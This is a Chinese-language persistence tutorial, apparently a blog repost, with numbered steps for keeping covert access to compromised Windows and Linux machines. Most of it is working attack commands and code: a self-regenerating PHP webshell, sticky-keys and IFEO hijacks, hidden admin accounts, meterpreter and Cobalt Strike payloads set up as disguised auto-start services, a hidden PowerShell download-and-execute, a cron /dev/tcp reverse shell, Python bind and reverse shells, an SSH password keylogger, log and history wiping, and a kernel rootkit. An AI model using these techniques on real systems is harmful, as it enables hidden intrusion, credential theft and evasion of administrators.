权限维持篇

一、Windows

1、 不死马权限维持

1.1  概述
<?php
ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.
set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去
$interval = 5; // 每隔*秒运行
do {
$filename = 'test.php';
if(file_exists($filename)) {
echo "xxx";
}
else {
$file = fopen("test.php", "w");
$txt = "<?php phpinfo();?>\n";
fwrite($file, $txt);
fclose($file);
}
sleep($interval);
} while (true);
?>
1.2  环境准备

1、Windows Server 2012

2、phpstudy

1.3  复现

1、上传到目标网站目录中,保存为 1.php,如果可以,可以把属性设置为隐藏,也可以设置为不可删除;

2、访问 1.php 文件,此时会自动生成 test.php 文件,除非重启 apache 服务器,否则 test.php 文件就算删除也会一直生成;

2、映像劫持技术

2.1  概述

通过在注册表

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options

路径下添加自定义的字符串值,然后添加路径。进行 exe 劫持

2.2  复现

1、访问 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options 路径,新建项,命名为 chun.exe,然后新建字符串值 ,改名为 Debugger。

2、双击,填入后门的地址,此处以 cmd.exe 为例:

C:\Windows\System32\cmd.exe

3、此时若用户访问任何以 chun.exe 命名的 exe 文件,那么将直接执行 cmd.exe,达到映像劫持的目的。

3、策略组脚本维持

3.1  概述

        在策略组脚本目录中上传脚本文件,内容是后门或其它,然后设置电脑每次重启都会运行该 exe 文件。

3.2  复现

1、进入以下目录:

C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup

2、创建 1.bat 文件:

@echo off
systeminfo >1.txt

3、设置开机自动运行:

(1)win + r 输入 gpedit.msc 打开本地策略组;

(2)顺序点击以下选项:

填入脚本路径

然后点击确定,重启计算机,脚本执行成功。

4、shift 后门

4.1  概述

        shift 连按五次后会弹出粘滞键界面,我们可以对这个快捷方式进行替换,替换成我们想执行的后门文件。

4.2  复现

1、在目录 C:\windows\system32\ 下找到 sethc.exe 文件,选中右键,点击属性;

2、点击安全,点击高级:

3、点击更改,点击立即查找,更改用户为管理员用户:

4、把权限设为全部允许:

5、执行以下命令(以 cmd.exe 为例)

move C:\windows\system32\sethc.exe C:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe

6、 此时连按5次 shift 键就会执行 cmd.exe 了,达到劫持的效果

5、建立影子账号

5.1  概述

        建立账户后,通过一系列操作来使得账户隐藏

5.2  复现

1、先建立一个账户:

net user admin$ 123456 /add
net localgroup administrators admin$ /add

2、此时用 net user 命令,是看不到用户 admin$ 的

$ 使得 cmd 查询不到

3、但是可以通过以下途径看到:

(1)在控制面版中可以看到:

(2)在计算机管理下也是可以看到的:

接下来对他们进行隐藏。

4、操作注册表:

(1)win + r 输入 regedit 打开注册表

(2)进入 表 HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 目录

注意:此时若 SAM 目录看不到里面的内容,说明是没有访问权限,需要设置访问权限;

设置为如下图的样子:

 重新打开注册表,此时就可以正常查看 SAM 目录下的内容了

(3)观察下列数值是对应的:

(4)复制管理员用户 1F4 文件夹下 F 的内容

双击点开,右键,全选,复制:

(5)粘贴到 3ea 的 F 中:

(6)导出 3ea 和 admin$ 的配置文件,右键,导出:

命名为1

命名为2

(7)在计算机管理中,把 admin$ 删除

(8)双击运行刚才保存的文件 1 和文件 2

此时计算机管理界面中就没有 admin$ 的信息了

控制面板中也没有 admin$ 用户信息了

但是注册表中依然会有用户信息

6、powershell 配置后门

6.1  概述

        目的是每次启动 powershell 的时候会自动运行后门文件。

6.2  复现

1、检查 powershell 的配置文件信息:

echo $profile   // 输出配置文件的路径
Test-path $profile  // 用于指示当前用户是否有自定义的 PowerShell 配置文件。如果配置文件存在,则返回 True;如果不存在,则返回 False

2、如果返回 false 则创建一个:

New-Item -Path $profile -Type File –Force

3、添加后门路径:

$string = 'Start-Process "C:\1.bat"'
$string | Out-File -FilePath $profile -Append
more $profile

后门内容(这里以添加用户为例):

net user chun 123456 /add & net localgroup administrators chun /add

4、重启 powershell ,发现用户成功创建

7、Monitor 权限维持

7.1  概述

7.2  复现

1、下载项目:GitHub - Al1ex/Monitor: A old way to Persistence

2、把项目中 Release 文件夹下的 monitor.exe 复制到 C:/Windows/System32 目录下

3、使用 msf 生成 dll 后门:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.103.130 LPORT=7788 -f dll > test.dll
也可以使用 -o 指定保存路径
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.103.130 LPORT=7788 -f dll -o /tmp/test.dll

4、把 shell.dll 复制到 C:/Windows/System32 目录下

5、msf 开启监听:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.103.130
set lport 7788
exploit

6、运行 monitor.exe ,此时 msf 获取到 meterpreter

7、但是每次都要运行 monitor.exe 会很麻烦,所以要设置开机自启动,打开注册表,然后找到目录 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors ,执行 cmd 命令:

reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

此时重启计算机,msf 就会自动上线了

8、利用安全描述符隐藏服务后门进行权限维持

8.1  概述

8.2  复现

1、使用 CS 上线:

(1)在 kali 中启动服务(运行 server 目录下的 teamserver):

(2)在物理机中 Client 文件夹下点击运行 cobaltstrike-client.vbs,输入账号和密码进行登录

(3)设置监听器,生成 windows 可执行文件,保存为 beacon.exe ,上传到目标主机的 C:\Users\Administrator 目录下

(4)运行可执行文件,发现上线成功

2、设置 beacon.exe 为自启动

使用 cmd 
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\Administrator\beacon.exe" depend= Tcpip obj= Localsystem start= auto
或
使用 powershell
New-Service -Name ".NET CLR Networking 3.5.0.0" -DisplayName ".NET CLR Networking 3.5.0.0" -BinaryPathName "cmd.exe /k C:\Users\Administrator\beacon.exe" -StartupType AutomaticDelayedStart

注意:服务名(.NET CLR Networking 3.5.0.0)可以自己自定义,但是必须要具有一定迷惑性

命令执行后,服务创建成功:

以上设置完成后,其实每次开机服务都会自动开启了。

也可以在任务管理器中右键手动开启服务,但是可以使用命令很轻松的查询到

(1)cmd 使用 sc query
sc query | finstr ".NET CLR Networking 3.5.0.0"(2)powershell 使用 Get-Service  
Get-Service | finstr ".NET CLR Networking 3.5.0.0"

 3、在任务管理器中隐藏服务:

sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

这是启动服务可以用如下命令:

net start ".NET CLR Networking 3.5.0.0"

4、但是如果管理员查看注册表,还是可能发现问题的

这时候就要对这些信息进行隐藏

(1)在 kali 中编辑 1.ps1 然后保存:

function Server-Sddl-Change{
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][String]$Name
)
$ROOT = "HKLM:\SYSTEM\CurrentControlSet\Services\"
$S = $ROOT+$NAME
$acl = Get-Acl $S
$acl.SetAccessRuleProtection($true, $false)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access = [System.Security.AccessControl.RegistryRights]"QueryValues"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Deny"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
$person = [System.Security.Principal.NTAccount]"Everyone"
$access =
[System.Security.AccessControl.RegistryRights]"SetValue,CreateSubKey,EnumerateSu
bKeys,Notify,CreateLink,Delete,ReadPermissions,WriteKey,ExecuteKey,ReadKey,Chang
ePermissions,TakeOwnership"
$inheritance = [System.Security.AccessControl.InheritanceFlags]"None"
$propagation = [System.Security.AccessControl.PropagationFlags]"None"
$type = [System.Security.AccessControl.AccessControlType]"Allow"
$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `
$person,$access,$inheritance,$propagation,$type)
$acl.AddAccessRule($rule)
Set-Acl $S $acl
}

(2)开启 http 服务器:

sudo python -m http.server 5566

(3)远程执行 powershell 命令来下载执行 1.ps1:

powershell.exe -exec bypass -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://192.168.103.130:5566/1.ps1')); Server-Sddl-Change -Name '.NET CLR Networking 3.5.0.0'"

此时敏感信息就没有了

 9、IIS 后门

9.1  概述 

        在 IIS 网站目录里上传 DLL 文件,修改配置文件,达到权限维持的目的。

9.2  复现

1、工具地址:GitHub - WBGlIl/IIS_backdoor: backdoor

2、在 IIS 服务器中,一般在 C:\inetpub\wwwroot\bin 目录下会存放 dll 文件,所以我们先上传工具 /bin 目录下的 IIS_backdoor_dll.dll 到这个目录,可以对文件进行隐藏

3、上传 web.config 到 C:\inetpub\wwwroot 目录下,若 web.config 已存在,需要把下述内容按照情况加到 web.config 中

<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer><modules><add name="IIS_backdoor" type="IIS_backdoor_dll.IISModule" /></modules></system.webServer>
</configuration>

 4、这时候直接访问服务器内的任意一个网站或任意一个文件(如 png,txt 等),打开工具 /bin 目录下的 IIS_backdoor_shell.exe ,输入刚才访问成功的网址,然后输入 cmd 命令即可成功执行。

 10、Windows 隐藏技术

10.1  概述

        用 Windows 隐藏技术把后门文件隐藏起来。

10.2  复现

1、最简单的隐藏,选中文件,右键 -> 属性 -> 勾选隐藏:

但是只要勾选了查看隐藏文件就可以看到了

2、使用命令进行深度隐藏:

Attrib +s +a +h +r webshell.aspx

这时候就算勾选了显示隐藏的项目也看不到了,还有一种方法是点击选项,把隐藏受保护的文件的勾去掉,这时候就可以看到被隐藏的文件了

11、驱动级文件隐藏

11.1  概述

11.2  复现

1、下载工具:Thank you for downloading Easy File Locker (64-bit) from CNET Download.com

2、点击 Add file 添加文件:

3、只保留一个勾:

这时候只能访问,不能修改,不能删除,也不可见

4、这时候如果我们是被害者,找不到文件,也找不到 easy file locker ,可以使用如下命令解决:

sc query xlkfs
net stop xlkfs
sc delete xlkfs

二、Linux

1、修改文件/终端属性

1.1  修改文件创建时间

1、概述:如果蓝队根据文件修改时间来判断文件是否为后门,如参考 index.php 的时间再来看shell.php 的时间,就可以判断 shell.php 的生成时间有问题(如创建时间相差巨大或最新创建)。

2、操作:

touch -r index.php shell.php

touch -r 用 index.php 的文件的属性来创建 shell.php ,这样两个文件属性就是一样的。

1.2  修改文件锁定

1、概述:在 Linux 中,使用 chattr 命令来防止 root 和其他管理用户误删除和修改重要文件及目录,此权限用 ls -l 是查看不出来的,从而达到隐藏权限的目的。

2、操作:

sudo chattr +i test.php #锁定文件
rm -rf test.php #提示禁止删除
lsattr test.php #属性查看
sudo chattr -i test.php #解除锁定
rm -rf test.php #彻底删除文件
1.3  修改历史操作命令

1、概述:        

        在 shell 中执行的命令,记录在命令行历史中,可以用 history 命令查看,下面讲述如何开启无痕操作模式。

2、操作:

(1)技巧一,禁用历史记录:

[space]set +o history

        上面的命令会临时禁用历史功能,这意味着在这命令之后你执行的所有操作都不会记录到历史中,然而,这个命令之前的所有东西都会原样记录在历史列表中。

恢复历史记录的命令:

[space]set -o history

(2)技巧二,从历史记录中删除指定命令:

history | grep '要删除的命令的关键词'
history -d 删除的命令的项数

(3)技巧三,批量删除历史记录:

sed -i '150,$d' ~/.bash_history这是一个用于在 Bash 中编辑历史记录文件(~/.bash_history)的 sed 命令。
sed: 是流编辑器,用于处理和转换文本。
-i: 表示直接在文件中进行编辑(in-place)而不是输出到终端。
'150,$d': 是 sed 命令中的表达式,表示从第 150 行到文件末尾($ 表示最后一行)删除(d 表示删除)。
因此,这个命令的意思是:从 ~/.bash_history 文件的第 150 行开始,一直删除到文件末尾的所有行。在 Bash 中,~/.bash_history 文件通常用于存储用户的命令历史记录。

1.4  password 写入

1、概述:

(1)使用命令 cat /etc/passwd 时,各部分的含义:

补充:如果不知道哪些是用户,可以使用命令:cat /etc/passwd | grep bash

用户名:密码:用户ID:组ID:身份描述:用户的家目录:用户登录后所使用的SHELL
root:x:0:0:root:/root:/bin/bash
web2:x:1000:1000:web2,,,:/home/web2:/bin/bash

(2)使用 cat /etc/shadow 命令

用户名:密码的MD5加密值:自系统使用以来口令被修改的天数:口令的最小修改间隔:口令更改的周期:口令失效的天数:口令失效以后帐号会被锁定多少天:用户帐号到期时间:保留字段尚未使用root:$6$6.imW5Ld$qNRtolNQ3MShopajilTqD89NmsGpVDKE08.Hno.ac6/nfbXia3HBjZT6r7/WtC3CoUUCRfDwOF2cFpKLORYk81:18920:0:99999:7:::
web2:$6$mXlE4pZ9$b0njm2mozkJu2851SUHDgKNhN3LIQhYa/cL8yUEO26n1tmiJTLwZN1sEyoiD074IPhrHkCVzAwQvIulBM0.0z0:18920:0:99999:7:::

2、操作:

(1)生成加密后的密码:

perl -le 'print crypt("passwd","salt")'

这个 Perl 命令用于生成一个加密过的密码哈希。具体而言:

  • perl: 启动 Perl 解释器。
  • -le: 是命令行选项,表示在每行末尾添加换行符(line ending)。
  • 'print crypt("passwd","salt")': Perl 表达式,使用 crypt 函数生成密码的哈希值。其中,"passwd" 是要加密的密码,"salt" 是用于加密的盐值。

(2)创建管理员用户:

echo "m123:sadtCr0CILzv2:0:0:/root:/bin/bash" >> /etc/passwd

创建成功

这时候也可以用 ssh 进行远程连接:

ssh m123@192.168.103.174

2、suid 后门

2.1  概述

        在 root 权限下创建 suid 权限的可执行程序,普通用户执行可执行程序后权限就会提升为 root;

2.2  操作

1、创建 suid 权限的文件:

cp /bin/bash /tmp/test
chmod 4755 /tmp/test
ls -al /tmp/test

2、执行可执行程序:

./test -p

3、查找具有 suid 权限的文件,不一定非得是 bash:

find / -perm -u=s -type f 2>/dev/null

3、SSH 后门

3.1  SSH 软链接后门
3.1.1  概述

        软链接后门的原理是利用了 PAM 配置文件的作用,将 sshd 文件软连接名称设置为 su,这样应用在启动过程中他会去 PAM 配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 只检测 uid=0 即可认证成功,这样就导致了可以使用任意密码登录:

3.1.2  操作

(1)创建软链接:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345

(2)远程 ssh 登录:

ssh root@q192.168.103.174 -p 12345

密码随便输入就能连接成功了

3.2  SSH 公钥免密码登录
3.2.2  概述

        保存服务器的公钥直接

3.2.2  操作

1、在服务器中生成公钥和私钥,注意要在管理员权限下生成:

ssh-keygen -t rsa

2、在服务器中保存生成的公钥:

cd ~/.ssh
cat id_rsa.pub > authorized_keys

 

3、 在服务器中复制得到私钥 id_rsa 的内容:

cat id_rsa

4、在客户端中保存为 id_rsa 并设置权限:

vim id_rsa
chmod 600 id_rsa

5、远程进行 SSH 连接:

ssh -i id_rsa root@192.168.103.174
3.3  SSH keylogger 记录密码
3.3.1  概述

        当前系统如果存在 strace 的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的目的,只能监听本地的连接操作。

3.3.2  操作

1、修改 .bashrc 文件:

(1)打开编辑 .bashrc
vim ~/.bashrc
(2)添加以下内容
alias ssh='strace -o "/tmp/pwdlog_$(date +"%Y%m%d_%H%M%S")" -e read,write,connect -s 2048 ssh'
(3)重新加载.bashrc
source ~/.bashrc

2、登录 ssh:

ssh root@192.168.103.172

3、查看生成的 log 文件:

cat log | grep password

4、Ubuntu 利用 Cron 机制安装后门
4.1  概述

1、Cron 是 ubuntu 下默认启动的用户执行计划,它会按照设置,在固定的周期或者按照一定时间执行某一个任务。

2、它是一项服务,你可以使用基本的服务查看状态命令等查看信息:

service cron status

3、 查看普通用户的计划:

crontab -l

 4、编辑计划:

crontab -e 
4.2  操作

1、设置 Cron 设置反向 shell ,每小时执行一次:

(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.103.130/7788 0>&1';\r%100c\n")|crontab -

2、攻击主机进行监听:

nc -lvnp 7788
5、 vim python 拓展后门
5.1  概述

        适用于安装了 python 和 vim 的 linux 系统

5.2  操作

1、编辑后门文件:

(1)正向后门( 下面的操作用正向连接来举例):

from socket import *
import subprocess
import osserver = socket(AF_INET, SOCK_STREAM)
server.bind(('0.0.0.0', 5566))
server.listen(5)
print('waiting for connect')
talk, addr = server.accept()
print('connect from', addr)
proc = subprocess.Popen(["/bin/sh", "-i"], stdin=talk, stdout=talk, stderr=talk, shell=True)

(2)反向后门:

import socket
import subprocess
import oss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.103.130", 5566))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

(3)隐藏连接时的输出:

(nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &) && sleep 2 && rm -f 1.py

(4)使用命令查看 TCP 连接进程:

netstat -anpt

(5)这时候可以进行正向连接了:

nc 192.168.103.174 5566

(6)但是由于进程中可以看到 vim 的进程,所以需要进行隐藏,为了方便演示,这里就先不删除文件了,所以隐藏输出的语句变成了:

nohup vim -E -c "py3file 1.py"> /dev/null 2>&1 &

执行指令

(7)隐藏进程的操作:

         mount --bind 命令是将前一个目录挂载到后一个目录上,所有对后一个目录的访问其实都是对前一个 目录的访问,并且会将前一个目录路径隐藏起来

netstat -anpt

mkdir null
mount --bind null /proc/3128
netstat -anpt

隐藏成功 ,这时候也可以进行连接:

ssh 192.168.103.174 5566

补充(取消挂载):

(1)查看挂载记录:

cat /proc/$$/mountinfo

(2)删除挂载:

sudo umount /proc/3128

6、inetd 服务后门

6.1  概述

        inetd 是一个监听外部网络请求(就是一个 socket )的系统守护进程,默认情况下为13端口。当inetd 接收到 一个外部请求后,它会根据这个请求到自己的配置文件中去找到实际处理它的程序,然后再把接收到的 这个 socket 交给那个程序去处理。所以,如果我们已经在目标系统的 inetd 配置文件中配置好,那么来自 外部的某个 socket 是要执行一个可交互的 shell,就获取了一个后门。

6.2  操作

1、查看目标主机是否有 inetd,若没有,就安装一个:

apt install openbsd-inetd

2、编辑服务配置文件:

(1)添加默认端口:

vim /etc/services

(2)添加服务内容:

woot 5566/tcp

 

3、编辑工具配置文件:

(1)打开文件:

vim /etc/inetd.conf

 (2)添加内容:

woot stream tcp nowait root /bin/bash bash -i

 4、启动 inetd:

inetd

5、远程主机进行正向连接:

nc 192.168.103.171 5566

7、协议后门

7.1  概述

        在一些访问控制做的比较严格的环境中,由内到外的 TCP 流量会被阻断掉。但是对于UDP、DNS、ICMP 等相关流量通常不会拦截。

8、PAM 后门

8.1  概述

        上面提到的 sshd 软链接后门利用的 PAM 机制达到任意密码登录,还有一种方式是键盘记录。原理主要是通过 pam_unix_auth.c 打补丁的方式潜入到正常的 pam 模块中,以此来记录管理员的帐号密码。

9、Rootkit

9.1  概述

        使用 Diamorphine 进行权限提升

9.2  操作

1、下载工具:GitHub - m0nad/Diamorphine: LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64)

2、工具初始化:

(1)进入工具目录
(2)使用 make 指令,若未下载 make,使用 apt install make
(3)使用 insmod diamorphine.ko 命令

3、在普通用户下进行提权:

kill -64 pid号 指定某用户变成 root
kill -64 0

现在就是 root 权限了

4、隐藏进程:

隐藏进程 kill -31 pid号

5、隐藏模块:

隐藏模块 kill -63 pid号 
idmod 命令可以看到所有的模块名称

 6、卸载模块:

rmmod diamorphine

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/612518.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vue3.2引用unplugin-vue-components插入,解放开发中import组件

目录 前言引用unplugin-vue-components插件的优缺点优点缺点 unplugin-vue-components插件引入安装插件配置vite配置更新TypeScript配置使用代码位置 总结Q&A 前言 unplugin-vue-components是一个用于Vue.js项目的插件&#xff0c;特别适用于Vite和Webpack构建工具。它的主…

Java零基础教学文档第三篇:JDBC

今日新篇章 【JDBC】 【主要内容】 JDBC概述 使用JDBC完成添加操作 使用JDBC完成更新和删除 DBUtils的简单封装 使用JDBC完成查询 使用JDBC完成分页查询 常用接口详解 JDBC批处理 SQL注入问题 事务处理解决转账问题 连接池 使用反射对DBUtils再次的封装 BaseDAO的封…

Django报错处理

django.template.exceptions.TemplateDoesNotExist: django/forms/widgets/text.html django.template.exceptions.TemplateDoesNotExist: django/forms/widgets/number.html以上报错是pycharm中创建虚拟环境之后把原本自带的templates文件删除&#xff0c;重新在app01下面创建…

Unity Delaunay三角剖分算法 动态生成

Unity Delaunay三角剖分算法 动态生成 Delaunay三角剖分Delaunay三角剖分 定义Delaunay 边Delaunay 空圆特性 Delaunay 三角形Delaunay 最大化最小角特性 Delaunay 三角形特征Delaunay 算法Delaunay Lawson算法Delaunay Bowyer-Watson算法 Unity Delaunay三角剖分 应用Unity 工…

Linux——firewalld防火墙(二)

一、firewalld高级配置 1、IP地址伪装 地址伪装&#xff08;masquerade):通过地址伪装&#xff0c;NAT设备将经过设备的包转发到指定接收方&#xff0c;同时将通过的数据包的源地址更改为其自己的接口地址。当返回的数据包到达时&#xff0c;会将目的地址修改为原始主机的地址…

CMU15-445-Spring-2023-Project #2 - 前置知识(lec07-010)

Lecture #07_ Hash Tables Data Structures Hash Table 哈希表将键映射到值。它提供平均 O (1) 的操作复杂度&#xff08;最坏情况下为 O (n)&#xff09;和 O (n) 的存储复杂度。 由两部分组成&#xff1a; Hash Function和Hashing Scheme&#xff08;发生冲突后的处理&…

神经辐射场(NeRF)概述

神经辐射场&#xff08;NeRF&#xff09;是一种用于三维场景重建的深度学习算法。它能够从一组稀疏的二维图片中重建出高质量的三维场景。 以下是对NeRF算法的原理和实现方法的详细解释&#xff1a; NeRF算法原理&#xff1a; 基本概念&#xff1a; NeRF算法基于光线追踪的原理…

Unified-IO 2 模型: 通过视觉、语言、音频和动作扩展自回归多模态模型。给大家提前预演了GPT5?

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…

从0到1实现html文件转换为markdown文档(进度0.1)

Spider-Man 前言准备环境1、node.js2、git 执行指令顺序报错及其解决方案一、npm 错误&#xff01;可以在以下位置找到此运行的完整日志解决方案 二、没有修改权限解决方案&#xff1a; 注意事项总结 前言 当我们处理文档时&#xff0c;常常会遇到将HTML文档转换为Markdown文档…

残疾人聋哑人专用起床叫醒器震动起床提醒器

残疾人聋人专用起床叫醒器震动起床提醒器是为特殊教育学校提供的一种安全防护设施&#xff0c;符合特教行業標準8.7電教、信息網路設備的規定&#xff0c;系统采用了全自动IP网络控制、每个设备内带有IP地扯能独立控制每一个宿舍和教室&#xff0c;在同一时间内&#xff0c;多功…

TypeScript进阶(二)深入理解装饰器

✨ 专栏介绍 TypeScript是一种由微软开发的开源编程语言&#xff0c;它是JavaScript的超集&#xff0c;意味着任何有效的JavaScript代码都是有效的TypeScript代码。TypeScript通过添加静态类型和其他特性来增强JavaScript&#xff0c;使其更适合大型项目和团队开发。 在TypeS…

【解决】Unity Project 面板资源显示丢失的异常问题处理

开发平台&#xff1a;Unity 2021.3.7f1c1   一、问题描述 在开发过程中&#xff0c;遭遇 Project 面板资源显示丢失、不全的问题。但 Unity Console 并未发出错误提示。   二、解决方案&#xff1a;删除 Library 目录 前往 “工程目录/Library” 删除内部所有文件并重打开该…

【JVM】本地方法接口 Native Interface

一、JNI简介 JVM本地方法接口&#xff08;Java Native Interface&#xff0c;JNI&#xff09;是一种允许Java代码调用本地方法&#xff08;如C或C编写的方法&#xff09;的机制。这种技术通常用于实现高性能的计算密集型任务&#xff0c;或者与底层系统库进行交互。 二、JNI组…

Python教程16:使用海龟画图turtle画会动的时钟

---------------turtle源码集合--------------- Python教程36&#xff1a;海龟画图turtle写春联 Python源码35&#xff1a;海龟画图turtle画中国结 Python源码31&#xff1a;海龟画图turtle画七道彩虹 Python源码30&#xff1a;海龟画图turtle画紫色的小熊 Python源码29&a…

CRMEB多商户短信开发

在使用CRMEB多商户系统的时候&#xff0c;想要二开使用其他平台的短信&#xff0c;这里以阿里云短信为例的具体实现方法。 一、加载阿里云短信的SDK&#xff0c;执行命令&#xff1a;composer require alibabacloud/dysmsapi-20170525 二、增加阿里云短信的驱动 1.在 crmeb\…

【REST2SQL】07 GO 操作 Mysql 数据库

【REST2SQL】01RDB关系型数据库REST初设计 【REST2SQL】02 GO连接Oracle数据库 【REST2SQL】03 GO读取JSON文件 【REST2SQL】04 REST2SQL第一版Oracle版实现 【REST2SQL】05 GO 操作 达梦 数据库 【REST2SQL】06 GO 跨包接口重构代码 MySQL是一个关系型数据库管理系统&#xf…

什么是编程思路?如何训练提升自己的编程思路?

哈喽&#xff0c;大家上午好呀&#xff01;又和大家如期见面了&#xff01; 今天给大家分享改变编程思路的9条技巧。 1.拆分项目&#xff0c;再编程 先按大类写子程序&#xff0c;例如自动&#xff0c;手动&#xff0c;报警&#xff0c;然后子程序中写FB块&#xff0c;FC程序&…

el-upload实现可替换、删除、预览的图片上传。js 往返缓存(可判断当前页面是不是返回的页面)

el-upload实现可替换、删除、预览的图片上传 组件使用&#xff1a; <template><div><UploadImage sendUrl :limit"1" :size"size" :gifSize"gifSize" v-model"images"></UploadImage> </div> </tem…

【Linux】Linux系统编程——Linux目录结构

Linux的文件系统呈现为一种树状结构&#xff0c;以根目录/为最顶层&#xff0c;其下分布着各种不同的子目录&#xff0c;每个目录都有其特定的用途和功能。下面是Linux目录结构的详细介绍&#xff1a; 1. 根目录 / 根目录是整个文件系统的基础。所有的目录和文件都从这里开始…

LeetCode刷题13:回溯+剪枝解决216.组合总和 III

找出所有相加之和为 n 的 k 个数的组合&#xff0c;且满足下列条件&#xff1a; 只使用数字1到9每个数字 最多使用一次 返回 所有可能的有效组合的列表 。该列表不能包含相同的组合两次&#xff0c;组合可以以任何顺序返回。 示例 1: 输入: k 3, n 7 输出: [[1,2,4]] 解…